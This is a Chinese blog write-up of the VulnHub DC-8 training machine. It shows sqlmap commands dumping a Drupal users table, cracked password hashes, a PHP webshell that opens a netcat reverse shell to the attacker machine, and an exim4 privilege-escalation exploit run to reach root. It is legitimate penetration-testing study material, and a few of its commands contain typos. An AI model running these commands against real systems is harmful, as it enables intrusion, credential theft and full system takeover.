DC8_靶场训练

最新推荐文章于 2024-03-21 20:40:05 发布
最新推荐文章于 2024-03-21 20:40:05 发布
阅读量998 收藏 2
点赞数 2
文章标签: 安全漏洞 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JSH_CDX/article/details/105230289
版权

一.环境介绍

虚拟机平台:VMware Workstation Pro

攻击机:Kali2017(IP:10.10.10.133)

靶机:DC-8(IP:10.10.10.132)

二.信息收集

扫描所在局域网内存活的主机

netdiscover -r 10.10.10.0/24  //后面接要扫描的ip网段

在这里插入图片描述这里探测到的10.10.10.132即为DC8靶机的ip地址,接下来使用nmap扫描主机,查看端口和服务,发现目标主机开放了22和80端口

nmap -sS -A -p- -T4 10.10.10.132

在这里插入图片描述

三.漏洞挖掘与利用

直接访问主机ip地址,默认访问80端口,在欢迎页发现疑似注入点
在这里插入图片描述对疑似注入点进行手动测试,1后面加一个单引号,根据报错信息发现存在SQL注入点在这里插入图片描述
接下来使用SQLmap进行自动化注入

sqlmap -u "http://10.10.10.132/?nid=1%27" --dbs
sqlmap -u "http://10.10.10.132/?nid=1%27" --dbs -D d7db --tables
sqlmap -u "http://10.10.10.132/?nid=1%27" --dbs -D d7db -T users --columns
sqlmap -u "http://10.10.10.132/?nid=1%27" --dbs -D d7db -T users -C "uid,name,pass" --dump

爆数据库
在这里插入图片描述爆数据表
在这里插入图片描述查找有用数据表
在这里插入图片描述
爆字段
在这里插入图片描述拖裤
在这里插入图片描述得到账号密码,但是被加密了
在这里插入图片描述先把账号密码复制在DC8_password.txt里,然后用john爆破

admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF 
//以上为文档里的内容,注意不能多出空格

john DC8_password.txt  //用john爆破密码

账号:john
密码:turtle

在网站上找不到登录的地方,我们可以扫描网站目录

dirb http://10.10.10.132

在这里插入图片描述
这里只爆破出了john的密码,可用来登录网站后台,接下来的思路就和DC7一样,需要反弹shell。

在这里插入图片描述
这里可能会想和DC7一样通过Add content–>Basic page去添加一个webshell,但是在这个靶机里面我们是通过Add content–>Webform–>From settings去添加webshell的,注意选择PHP code

<?php system("nc -e /bin/sh 10.10.10.133 4444");?>

在这里插入图片描述这里php代码前最好有一些其他内容,避免一些未知错误,写好shell后点击保存配置,回到view里填写自定义内容并提交,提交后便执行了刚刚的webshell,在提交前先在kali监听端口
在这里插入图片描述

nv -lvvp 4444 监听4444端口
python -c "import pty;pty.spawn('/bin/bash')" 得到交互式shell

在这里插入图片描述

四. 提权

接着查看哪些命令是root权限

find / -perm -4000 2>/dev/null

在这里插入图片描述发现exim4 ,查看对应版本信息

exim4 --version

在这里插入图片描述利用exim4提权,提权需要有写权限,www-data用户在当前目录下无写权限,查看目录权限发现/tmp目录有写入权限,切换到/tmp目录

ls -l

在这里插入图片描述接下来在kali上查找exim的漏洞攻击脚本,找到46996.sh脚本文件,这里kali2017找不到对应版本,可能是还没更新,所以我用kali2019找到对应版本漏洞攻击脚本,复制到根目录下再把脚本移入kali2017继续操作。
在这里插入图片描述查看脚本发现有两种执行方式

cat DC8_getshell.sh //查看脚本
./DC8_getshell.sh -m setuid //方式一执行脚本
./DC8_getshell.sh -m netcat //方式二执行脚本

在这里插入图片描述在kali上用vi查看编辑脚本文件类型,会出现 dos或unix格式,如果为dos,需要改为unix模式,不然会报错,这个报错是由于windows下编辑上传到linux下执行导致的

vi DC8_getshell.sh //编辑查看脚本
:set ff? //查看文件类型
:set ff=unix //修改文件为unix格式

在这里插入图片描述
在这里插入图片描述在kali上开启http服务给靶机下载exim漏洞脚本,记得在/tmp目录下下载脚本文件,并且修改脚本的权限,接着尝试两种方式执行脚本,方式二成功。

python -m SimpleHTTPServer //开启http服务
wget http://10.10.10.132:8000/DC8_getshell.sh //下载脚本到当前目录下,所以要进入有写入权限的/tmp目录下执行命令
chmod 777 getshell.sh //修改文件的权限

在这里插入图片描述方式一不成功
在这里插入图片描述方式二成功拿到root
在这里插入图片描述拿下flag
在这里插入图片描述至此,DC8就已经结束啦,谢谢您能坚持看到这里。

JSH_CDX
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机9 DC-8(过程超详细)
honest_gg的博客
09-26 2060
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
vulnhub DC8 靶场练习
鸥鹭忘机
09-03 1092
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第8台,下载地址为https://www.vulnhub.com/entry/dc-8,367/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的总体难度不大,利用的漏洞也是常见的,只要细心观察就可以发现这个突破口。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 3414
dc-8靶场详细渗透过程
DC-8靶场实战
最新发布
qq_42754807的博客
03-21 716
DC-9靶场实战
靶场练习第十六天~vulnhub靶场之dc-8
qq_57976347的博客
02-15 358
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:https://download.vulnhub.com/dc/DC-8.zip 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A -p- 192.168.101.121 2.网站的信息收集 (1)靶机开放了80端口,先访问
DC-DCboostconverter.rar_Boost_DC DC BOOST_dc-dc boost_dc/dc 程序_电
07-14
DC-DC Boost转换器是一种常见的直流到直流升压变换器,广泛应用于电源系统、电池管理系统、太阳能发电系统等领域。在电力电子技术中,它扮演着重要角色,能够将较低的直流电压提升到较高的直流电压,以满足不同负载...
DC.zip_DC shell_Linux dc
09-24
标题中的“DC.zip_DC shell_Linux dc”暗示了这是一个与Linux操作系统和DC shell相关的压缩文件。DC,全称“Desk Calculator”,是Unix和类Unix系统中的一种命令行计算器程序,可以执行高级算术运算。DC shell是基于...
DCCA_DCCA_
10-02
深度Canonical Correlation Analysis(DCCA)是一种机器学习技术,它扩展了传统的Canonical Correlation Analysis(CCA)方法,通过引入深度神经网络来探索和分析多视图数据中的潜在关联。DCCA在现代数据科学中有着...
DC_Motor_Model_dc_motor_电机_DCmotorsimulation_
10-02
标题中的"DC_Motor_Model"指的是直流电机模型,这通常是指在Simulink环境中构建的一种数学模型,用于模拟和分析直流电机的工作原理和性能。直流电机是电力驱动系统中的重要组成部分,广泛应用于各种机械设备和自动化...
dc.rar_dc machine_induction machine
09-19
标题中的"dc.rar_dc machine_induction machine"暗示了我们讨论的主题是关于直流电机(DC Machine)和感应电机(Induction Machine)的模型或仿真。在MATLAB的Simulink环境中,这两种电机是电气工程领域常见且重要的...
Vulnhub靶机:DC-8渗透详细过程
IerkeU的博客
03-28 2972
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个挑战试图证明在 Linux 上安装和配置的双重身份验证是否可以防止 Linux 服务器被攻击。这个挑战的最终目标是绕过双重身份验证,获取根并读取唯一标志。除非您尝试通过SSH登录,否则您可能甚至不知道安装和配置了双重身份验
【DC-8靶场渗透】
一纸荒芜的博客
08-13 2007
dc-8靶场
DC-8靶场
qq_49518993的博客
08-27 860
DC-8靶场
vulnhub靶机DC-8渗透笔记
liver100day的博客
07-27 295
文章目录环境准备1.信息收集1.1 主机发现1.2 端口扫描1.3 访问80端口(http服务)2.漏洞利用2.1 使用sqlmap爆破数据1.判断注入类型,构造语句2.判断列数,构建语句3.爆破数据库名,构建语句4.爆破d7db数据库中的所有表名,构建语句5.爆破users数据表中的所有字段名6.爆破name,pass字段中的所有数据2.2 使用john破解密码2.3 爆破目录2.4 写入一句话木马,反弹shell3.提权4.总计 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.
DC靶场系列--DC1
BGiscool的博客
06-28 4813
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1199
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2674
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
DC-1渗透靶场实战速通版
saber的博客
12-01 844
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
DC-3靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-27 5210
DC-3靶场渗透过程
dcat_admin 数据库迁移
05-26
如果你使用的是 Django 框架,进行数据库迁移可以使用以下命令: 1. 首先在 Django 项目根目录下执行以下命令,生成迁移文件: ``` python manage.py makemigrations dcat_admin ``` 2. 然后执行以下命令,将迁移文件应用到数据库中: ``` python manage.py migrate ``` 以上命令会自动检测并将尚未应用的数据库迁移应用到数据库中。如果你的应用程序中有多个数据库,可以使用 `--database` 参数指定要应用的数据库。 注意,如果你在修改模型时需要添加新字段或删除现有字段,必须生成新的数据库迁移并将其应用到数据库中,否则数据库模式将不会被更新。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值